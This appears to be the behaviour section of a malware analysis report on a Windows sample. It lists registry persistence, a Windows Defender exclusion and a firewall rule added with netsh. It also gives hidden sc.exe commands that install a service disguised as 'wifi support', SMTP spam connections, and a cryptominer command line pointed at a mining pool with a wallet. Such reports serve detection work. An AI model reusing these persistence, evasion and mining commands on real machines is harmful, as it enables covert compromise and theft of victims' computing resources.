Technical Information
- [<HKLM>\System\CurrentControlSet\Services\zlxzypkv] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\zlxzypkv] 'ImagePath' = '%WINDIR%\SysWOW64\zlxzypkv\lfvyqlfa.exe /d"<Full path to file>"'
- [<HKLM>\SYSTEM\CurrentControlSet\services\zlxzypkv] 'ImagePath' = '%WINDIR%\SysWOW64\zlxzypkv\lfvyqlfa.exe'
- 'zlxzypkv' %WINDIR%\SysWOW64\zlxzypkv\lfvyqlfa.exe /d"<Full path to file>"
- 'zlxzypkv' %WINDIR%\SysWOW64\zlxzypkv\lfvyqlfa.exe
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\SysWOW64\zlxzypkv' = '00000000'
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul
- %WINDIR%\syswow64\svchost.exe
- %TEMP%\lfvyqlfa.exe
- %WINDIR%\syswow64\config\systemprofile:.repos
- from %TEMP%\lfvyqlfa.exe to %WINDIR%\syswow64\zlxzypkv\lfvyqlfa.exe
- 'mi##########m.mail.protection.outlook.com':25
- 'gr####ilms.com.au':25
- 'go###.###.mx3.gower.rcimx.net':25
- 'ma##.#orgerush.net':25
- 'sp###.#ail.gandi.net':25
- 'ma##.#lobaluser.com':25
- 'mx.###denmother.org':25
- 'mx.####endoodles.com':25
- 'sp##.gokea.org':25
- 'cl######b.mailcontrol.com':25
- 'de###########-com.mail.protection.outlook.com':25
- 'mx##.##il.icloud.com':25
- 'mx##.###g.kundenserver.de':25
- 'mx#.#anwha.com':25
- 'gmr-smtp-in.l.google.com':25
- 'mx##.#-online.de':25
- 'aspmx.l.google.com':25
- 'mx.##server.com':25
- 'google.com':80
- '31.##.244.85':423
- '31.##.244.128':423
- '80.#6.75.4':423
- '31.##.244.127':423
- '31.##.244.82':423
- '31.##.244.126':423
- 'fa###ool.xyz':10060
- 'mx#.#aver.com':25
- '80.##.75.254':487
- 'sv####lfheim.top':443
- 'co####.telconet.net':25
- 'gr#####.mx.av-mx.com':25
- http://www.google.com/
- 'sv####lfheim.top':443
- 'gr####ilms.com.au':25
- 'go###.###.mx3.gower.rcimx.net':25
- 'ma##.#orgerush.net':25
- 'sp###.#ail.gandi.net':25
- 'ma##.#lobaluser.com':25
- 'mx.###denmother.org':25
- 'mx.####endoodles.com':25
- 'sp##.gokea.org':25
- 'cl######b.mailcontrol.com':25
- 'de###########-com.mail.protection.outlook.com':25
- 'gmr-smtp-in.l.google.com':25
- 'mx#.#anwha.com':25
- 'aspmx.l.google.com':25
- 'mx#.#aver.com':25
- '31.##.244.85':423
- '31.##.244.82':423
- '31.##.244.127':423
- '31.##.244.128':423
- '80.#6.75.4':423
- '31.##.244.126':423
- 'fa###ool.xyz':10060
- '80.##.75.254':487
- 'mx.##server.com':25
- 'gr#####.mx.av-mx.com':25
- DNS ASK mi##########m.mail.protection.outlook.com
- DNS ASK de####teropen.com
- DNS ASK de###########-com.mail.protection.outlook.com
- DNS ASK gl##al.com
- DNS ASK cl######b.mailcontrol.com
- DNS ASK go##a.org
- DNS ASK sp##.gokea.org
- DNS ASK go####doodles.com
- DNS ASK mx.####endoodles.com
- DNS ASK go####mother.org
- DNS ASK mx.###denmother.org
- DNS ASK go##t.co.za
- DNS ASK ma##.#lobaluser.com
- DNS ASK go##p.com
- DNS ASK sp###.#ail.gandi.net
- DNS ASK go###rush.net
- DNS ASK ma##.#orgerush.net
- DNS ASK go##r.net
- DNS ASK go###.###.mx3.gower.rcimx.net
- DNS ASK gr####ilms.com.au
- DNS ASK gr###myroom.com
- DNS ASK gmr-smtp-in.l.google.com
- DNS ASK mx##.##il.icloud.com
- DNS ASK gr#.net
- DNS ASK ic##ud.com
- DNS ASK on##ne.de
- DNS ASK sv####lfheim.top
- DNS ASK 23#.###.#12.82.dnsbl.sorbs.net
- DNS ASK na##r.com
- DNS ASK 23#.###.#12.82.bl.spamcop.net
- DNS ASK mx#.#aver.com
- DNS ASK 23#.###.#12.82.zen.spamhaus.org
- DNS ASK 23#.###.##2.82.sbl-xbl.spamhaus.org
- DNS ASK 23#.###.#12.82.cbl.abuseat.org
- DNS ASK 23#.###.112.82.in-addr.arpa
- DNS ASK fa###ool.xyz
- DNS ASK google.com
- DNS ASK bi###rdios.com
- DNS ASK mx.##server.com
- DNS ASK cb###ocare.com
- DNS ASK aspmx.l.google.com
- DNS ASK ac###sinter.net
- DNS ASK co####.telconet.net
- DNS ASK t-##line.de
- DNS ASK mx##.#-online.de
- DNS ASK ha##ha.com
- DNS ASK mx#.#anwha.com
- DNS ASK mx##.###g.kundenserver.de
- DNS ASK gr#####.mx.av-mx.com
- '%WINDIR%\syswow64\zlxzypkv\lfvyqlfa.exe' /d"<Full path to file>"
- '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\zlxzypkv\' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\lfvyqlfa.exe" %WINDIR%\SysWOW64\zlxzypkv\' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' create zlxzypkv binPath= "%WINDIR%\SysWOW64\zlxzypkv\lfvyqlfa.exe /d\"<Full path to file>\"" type= own start= auto DisplayName= "wifi support"' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' description zlxzypkv "wifi internet conection"' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' start zlxzypkv' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\zlxzypkv\
- '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\lfvyqlfa.exe" %WINDIR%\SysWOW64\zlxzypkv\
- '%WINDIR%\syswow64\sc.exe' create zlxzypkv binPath= "%WINDIR%\SysWOW64\zlxzypkv\lfvyqlfa.exe /d\"<Full path to file>\"" type= own start= auto DisplayName= "wifi support"
- '%WINDIR%\syswow64\sc.exe' description zlxzypkv "wifi internet conection"
- '%WINDIR%\syswow64\sc.exe' start zlxzypkv
- '%WINDIR%\syswow64\svchost.exe'
- '%WINDIR%\syswow64\svchost.exe' -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half